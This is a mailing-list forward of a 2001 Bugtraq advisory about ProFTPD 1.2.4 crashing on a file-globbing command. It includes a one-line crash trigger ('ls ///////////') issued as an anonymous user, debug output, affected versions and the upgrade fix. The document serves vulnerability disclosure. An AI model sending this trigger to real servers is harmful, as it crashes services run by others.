[devel] Fw: ProFTPD - Problems in file globbing, gives segmentation fault.

[Nikita Gergel <fc@altlinux.ru>]

[-- Attachment #1: Type: text/plain, Size: 2579 bytes --]



Begin forwarded message:

Date: Wed, 19 Dec 2001 14:22:40 +0100
From: "Mattias _" <surre1@hotmail.com>
To: bugtraq@securityfocus.com
Subject: ProFTPD - Problems in file globbing, gives segmentation fault.


SUMMARY
=======
A problem in handling file globbing exists in the current version of ProFTPD
1.2.4 (but it▓s fixed in the Candidate version: 1.2.5rc1). This
is very similar to the wu-ftpd bug (⌠ls ~{■) and occurs when you issue
the command: ls /////////// (11 or more ▒/▓). I haven▓t figured out if
it▓s exploitable. That▓s why I post it to you guys. :-)

AFFECTED VERSIONS
=================
ProFTPD 1.2.4
ProFTPD 1.2.2rc3
(Others may be affected as well.)

SYSTEMS
=======
This is tested on Slackware 8.

IMPACT
======
The ftpd-child dies with signal 11 (SEGV), but the server stays up.
The question is if it▓s possible to do something nasty with this!?

DETAILS
=======
The Segmentation Fault occurs when the server tries to free a
unallocated memory with a free()-function and it could be a heap
corruption vulnerability. It▓s in the file lib/glibc-glob.c in function
void globfree (pglob) the SEGV occurs.

Here is how I tested it.
Login as ftp(anonymous) and issue the command:
ftp> ls ///////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp>

And the debug messages reads (proftpd -n -d 5):
dispatching PRE_CMD command 'LIST ///////////' to mod_core
dispatching CMD command 'LIST ///////////' to mod_ls
active data connection opened - local : 127.0.0.1:20
active data connection opened - remote : 127.0.0.1:1286
in dir_check_full(): path = '/', fullpath = '/home/ftp/'.
ProFTPD terminating (signal 11)

VENDOR RESPONSE
===============
This problem has been reported to ProFTPD Bug Tracking System. It has
also been reported to security@proftpd.org where they asked me to wait
posting this until they release version 1.2.5rc1.

SOLUTION
========
Upgrade to version 1.2.5rc1.

REFERENCES
==========
ProFTPD (Get the latest version)
http://www.proftpd.org

ProFTPD Bug Tracking System (Where it was first reported):
http://bugs.proftpd.org/show_bug.cgi?id=1426

Information about the wu-ftpd problem:
http://www.corest.com

COMMENTS
========
This is my first post to Bugtraq, be nice to me...

Regards,
Mattias

surre1@hotmail.com


_________________________________________________________________
Join the world▓s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com




-- 
Nikita Gergel					System Administrator
Moscow, Russia					YAUZA-Telecom

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]